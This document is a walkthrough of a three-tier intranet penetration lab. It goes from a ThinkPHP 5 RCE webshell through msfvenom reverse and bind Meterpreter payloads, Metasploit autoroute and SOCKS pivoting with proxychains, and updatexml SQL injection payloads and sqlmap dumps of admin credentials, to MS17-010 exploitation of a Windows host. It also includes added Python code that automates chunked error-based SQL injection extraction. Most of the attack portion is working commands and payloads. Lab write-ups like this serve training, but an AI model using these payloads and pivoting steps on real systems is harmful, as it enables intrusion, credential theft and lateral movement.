Tips: after downloading the range, configure the network adapters, IP addresses and so on so that the three-tier intranet environment actually exists.
The range is penetrated layer by layer, from the web tier into the intranet. The aim is to learn the approach and lay a foundation for later intranet penetration.
The topology is as follows:
Topology image borrowed from brother Di, hhh
Penetration test
Target1:
Probe the target -> exploit the web vulnerability (ThinkPHP 5 RCE) -> obtain webshell access -> get the flag -> Target2
Information collection:
Use nmap to scan the ports:
(I did not use the IP addresses shown in the topology; I configured my own.)
nmap -sV -p 1-65535 -T4 192.168.153.135
If the site reports that it has not been set up yet, configure it in the BT (宝塔) panel backend. Environment setup tutorials:
Browse to port 80 found by the scan (the ThinkPHP public directory).
Target1 (built on ThinkPHP 5)
Go straight for an exploit or exploit tool (quick and convenient; you can also do it by hand if you prefer).
The tool generates the payload automatically and, very considerately, prints the backdoor's connection address and password as well.
Connect with AntSword and the shell and the flag are yours.
Or use a publicly released EXP:
Equally considerate: it prints the payload, pulls out the database details, and writes the file with one click.
Intranet lateral movement
Go straight to MSF.
1. Generate an MSF backdoor (use your own IP and port)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali-ip> LPORT=1111 -f elf > t1.elf
2. Set up the listener
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST <kali-ip>
set LPORT 1111
exploit
Upload the generated trojan with AntSword and execute it. If it lacks execute permission, run chmod +x t1.elf first.
Once it runs, the shell calls back and the penetration can continue from there.
Intranet proxy
Information gathering and access configuration
Get the network interfaces:  run get_local_subnets
View the routing table:      run autoroute -p
Add a route:                 run autoroute -s 192.168.22.0/24
Get the network interfaces: three network segments come back.
Check the routing table: nothing has been added yet.
Add the route for the 22 segment:
Once added it shows up in the routing table, and MSF modules (a ping sweep, for example) can reach the 22 segment, but only traffic that passes through the MSF session can.
The route exists, yet only the session that called back can reach the intranet target in the 22 segment; tools on Kali itself still cannot.
Tip: only traffic riding the session MSF received reaches the 22 segment; keep that clear in your head.
The current session is session 1, built on Target1's shell; with the route in place it can talk to the 22 segment. So how do we attack the 22 segment with our other tools through session 1?
(The answer is to open a proxy locally: MSF has a module that starts one. It listens on a port on Kali; tools on Kali, or on our own workstation (not the attacking Kali box), connect to that port and their traffic is carried through the session to 192.168.22.129.)
Use a SOCKS4 proxy plus proxychains4 to get through to the intranet:
background                               (puts the shell session in the background)
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
exploit
(On newer Metasploit this module has a VERSION option that selects SOCKS4a or SOCKS5; whichever it is set to, the proxychains entry must use the same type.)
On Linux, tools are pointed at this local proxy port as follows.
Tip: the proxychains config file must be edited, otherwise nothing comes back.
vim /etc/proxychains4.conf
Change the proxy entry at the end of the file (the [ProxyList] section) so that it points at the MSF listener instead of the default Tor entry.
nmap run directly on Kali cannot scan the 192.168.22.0 segment; it simply reports the hosts as not found.
Run it through the freshly configured proxy instead:
proxychains4 nmap -Pn -sT 192.168.22.0/24
proxychains4 nmap -Pn -sT 192.168.22.129
(-Pn and -sT are required: a SOCKS proxy only carries TCP connections, so ICMP host discovery and raw-socket SYN scans never reach the target.)
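The proxychains4 edit described above, as an added example that is not part of the original write-up: a small Python helper that rewrites the [ProxyList] section so that its only entry is the MSF SOCKS listener. The stock Kali file ends with Tor's default entry (socks4 127.0.0.1 9050); if that line stays, proxychains tries Tor first and the scan "finds nothing". Host 127.0.0.1, port 1080 and the socks4 type are assumptions that must match SRVHOST/SRVPORT (and, on newer Metasploit, the VERSION option) of auxiliary/server/socks_proxy; SAMPLE_CONF is a constructed, trimmed copy of a default config, not the author's file.

```python
"""Point proxychains4 at the Metasploit socks_proxy listener (added example)."""
import re
import sys

# Constructed sample: the tail of a stock Kali/Debian proxychains4.conf.
# Tor's 127.0.0.1:9050 is the entry that has to go.
SAMPLE_CONF = """\
# proxychains.conf  VER 4.x
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 \t127.0.0.1 9050
"""

# An active (uncommented) proxy entry: "<type> <host> <port>[ user pass]".
PROXY_LINE = re.compile(r"^\s*(socks4|socks5|http|raw)\s+\S+\s+\d+", re.IGNORECASE)


def set_proxylist(conf: str, host: str, port: int, kind: str = "socks4") -> str:
    """Return conf with [ProxyList] holding exactly one '<kind> <host> <port>' entry.

    Everything above [ProxyList] (chain mode, proxy_dns, timeouts) is kept; comments
    inside the section are kept; existing entries, the Tor default included, are
    dropped. A missing [ProxyList] section is appended.
    """
    if kind not in ("socks4", "socks5", "http"):
        raise ValueError("unsupported proxy type: " + kind)
    lines = conf.splitlines()
    try:
        start = next(i for i, l in enumerate(lines) if l.strip() == "[ProxyList]")
    except StopIteration:
        lines.append("[ProxyList]")
        start = len(lines) - 1
    head, section = lines[: start + 1], lines[start + 1:]
    kept = [l for l in section if not PROXY_LINE.match(l)]
    return "\n".join(head + kept + [f"{kind} {host} {port}"]) + "\n"


def proxy_entries(conf: str) -> list:
    """List the (type, host, port) entries proxychains would actually chain through."""
    entries, in_list = [], False
    for l in conf.splitlines():
        if l.strip() == "[ProxyList]":
            in_list = True
            continue
        if in_list and PROXY_LINE.match(l):
            parts = l.split()
            entries.append((parts[0].lower(), parts[1], int(parts[2])))
    return entries


if __name__ == "__main__":
    # Usage: sudo python3 fix_proxychains.py /etc/proxychains4.conf
    # Without a path it just shows the effect on the constructed sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_CONF
    patched = set_proxylist(text, "127.0.0.1", 1080)   # assumed SRVHOST/SRVPORT
    if path:
        with open(path, "w") as fh:
            fh.write(patched)
    print(patched, end="")
```

Check the result with proxy_entries() before scanning: if it still lists 9050, proxychains will hang on Tor. If you set VERSION 5 in the MSF module, pass kind="socks5" so the entry type matches.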
On Windows, install SocksCap64 or Proxifier and configure the proxy there.
Just add the tools you want to run through it.
If a browser needs to reach the 22 segment that is equally simple: point its network settings at the proxy.
The 22 segment is reachable; time for another round of information gathering.
The port scan shows port 80 open, running BageCMS.
Run a directory scan for the admin backend; I use dirb/dirsearch.
It finds a robots.txt.
robots.txt points to what looks like the admin backend; visit it and try.
The backend loads, but brute-forcing the login fails. Reviewing the site source reveals a SQL injection point.
Manual error-based injection
index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+
Table names:
index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+
Finally, the data comes out:
Cracking the MD5 hash gives the backend credentials: admin / 123qwe
Log in to the backend: http://url/index.php?r=admini/default/index
Or run sqlmap:
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword --dbs
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
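Chunked extraction for the updatexml() error-based injection above, as an added example that is not the write-up's own code. MySQL copies at most 31 characters of XPath context into the "XPATH syntax error" message, and the leading ~ marker uses one of them, so each request leaks at most 30 characters of data; a long group_concat() result has to be paged with substr(..., offset, 30). The code builds the payloads, parses the leaked fragment out of a response body, and walks the offsets until the closing ~ becomes visible. The HTTP round trip is replaced by fake_oracle, which emulates MySQL's truncation on a constructed secret so the example runs offline; the URL, parameter name keyword and table bage_admin are from the target above, the sample admin row is made up.

```python
"""Page through an error-based (updatexml) injection 30 characters at a time (added example)."""
import re
from urllib.parse import quote

MARK = "~"                     # 0x7e in the payload: brackets the leaked value in the error
CONTEXT = 31                   # MySQL keeps at most 31 chars of XPath context in the message
CHUNK = CONTEXT - len(MARK)    # so 30 data characters survive per request

# Injection point from the write-up; only the subquery changes per step.
BASE_URL = "http://192.168.22.129/index.php?r=vul"
PARAM = "keyword"

ERR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def xpath_payload(subquery: str, offset: int, width: int = CHUNK) -> str:
    """Raw (un-encoded) parameter value that leaks one chunk of subquery's result."""
    return (f"1' and updatexml(1,concat(0x7e,substr(({subquery}),{offset},{width}),0x7e),1)-- -")


def injected_url(subquery: str, offset: int) -> str:
    """Full GET URL, payload percent-encoded (send it with proxychains4 curl or requests)."""
    return f"{BASE_URL}&{PARAM}={quote(xpath_payload(subquery, offset), safe='')}"


def parse_leak(body: str):
    """Return (data, complete) from a response carrying the MySQL error, or None.

    complete is True when the closing ~ survived truncation, i.e. this was the last
    chunk. (A ~ inside the real data would end the walk early; pick another marker then.)
    """
    m = ERR_RE.search(body)
    if not m or not m.group(1).startswith(MARK):
        return None
    ctx = m.group(1)[len(MARK):]
    if ctx.endswith(MARK):
        return ctx[:-len(MARK)], True
    return ctx, False


def dump(send, subquery: str) -> str:
    """Reassemble the whole result of subquery; send(payload) returns a response body."""
    out, offset = "", 1
    while True:
        leak = parse_leak(send(xpath_payload(subquery, offset)))
        if leak is None:
            raise RuntimeError("no XPATH error in response: payload filtered or errors hidden")
        data, complete = leak
        out += data
        if complete or not data:
            return out
        offset += CHUNK


def fake_oracle(secret: str):
    """Stand-in for the HTTP round trip: evaluates substr() on a known string and
    reproduces MySQL's 31-character truncation of the error context."""
    sub_re = re.compile(r"substr\(\(.*\),(\d+),(\d+)\),0x7e\)")

    def send(payload: str) -> str:
        m = sub_re.search(payload)
        off, width = int(m.group(1)), int(m.group(2))
        xpath = MARK + secret[off - 1:off - 1 + width] + MARK
        return f"<b>Warning</b>: XPATH syntax error: '{xpath[:CONTEXT]}' in index.php"

    return send


if __name__ == "__main__":
    tables = ("select group_concat(table_name) from information_schema.tables "
              "where table_schema='bagecms'")
    print(injected_url(tables, 1))
    # Constructed row, not the real dump: 38 characters, so it takes two requests.
    sample = "admin:0123456789abcdef0123456789abcdef"
    print(dump(fake_oracle(sample), "select group_concat(username,0x3a,password) from bage_admin"))
```

With the write-up's substr(...,1,32) only 30 of the 32 requested characters are visible, so stepping the offset by 32 silently drops two characters per chunk; stepping by CHUNK (30) avoids that. To run it for real, replace fake_oracle with a function that fetches injected_url() through the SOCKS proxy and returns the response text.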
Log in to the backend and take the flag.
The backend has a content template feature; try writing a shell into it.
Connect to the shell with AntSword through the proxy; AntSword has its own proxy setting.
After getting the shell:
Next, upload another trojan to get a Meterpreter session. This target lives in 192.168.22.0/24 and cannot connect back to us, so it needs a bind (forward-connect) payload that MSF connects to through the route.
Generate the bind backdoor:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf
MSF connects forward to it:
background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.129
set LPORT 3333
exploit
Same routine as before: information gathering + access configuration.
Get the network interfaces:  run get_local_subnets
Add a route:                 run autoroute -s 192.168.33.0/24
View the routing table:      run autoroute -p
Continue scanning the 33 segment through the proxy:
proxychains4 nmap -Pn -sT 192.168.33.33
It turns out to be a Windows host with 445 and 3389 open; try EternalBlue (MS17-010).
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run
Once the session comes back, system commands can be run at will. The shell output is garbled here; chcp 65001 switches the console to UTF-8 and fixes it.
shell
net user
Search for the flag:
cd /
dir /S /B *flag*
type C:\Windows\System32\config\flag.txt
(/B lists bare file and folder names only; /S recurses into the directory and all of its subdirectories.)
Finally, type the file to read it.
With that, all three flags are in hand.
summary
1. It may be that the environment was not configured well, so both my local machine and Kali could connect to all three targets. emmmm, I have not found the reason; the network card is not working and I don't understand why it still works (let's pretend it doesn't, hhhhhh).
2. On Target2, I did not fully understand what the forward (bind) connection meant while attacking Target3.
3. Recap of the attack chain: port scanning the target IP finds port 80 running ThinkPHP, and the EXP gives a shell on Target1. Generate a trojan with MSF, upload it to Target1 and execute it with Kali listening; once the session is in, gather information and add the route for the 22 segment. On Linux, proxychains4 carries other tools' traffic through the proxy so they can scan the 22 segment; on Windows, Proxifier/SocksCap do the same. Scanning the 22 segment through the proxy finds port 80 with BageCMS; a directory scan finds the backend path in robots.txt; brute-forcing fails, but auditing the web source reveals the injection point, and sqlmap or manual injection yields the backend account and password. In the backend, the template feature lets us write a shell, which AntSword connects to: Target2's shell is won. Target2 is then used as a springboard against Target3 with a forward (bind) connection (my general understanding: the Target2 shell session obtained through MSF is used to continue against Target3): generate a bind backdoor and have MSF connect forward to it (personal understanding: since we already have Target2's shell, the trojan is run through that session, and because session 2 has the route, MSF can reach the 33 segment). Information gathering on Target3 finds 445/3389 open; MS17-010 is tried directly (or via Target2's session) and succeeds. Done.
4. Don't limit yourself to MSF. We do need to learn other tools later, such as CS, Ladon and the other common tools out there.
5. The main thing is to learn the approach and lay a foundation for later intranet penetration. Some parts I still don't get; emmmm, the intranet feels much harder than the web side.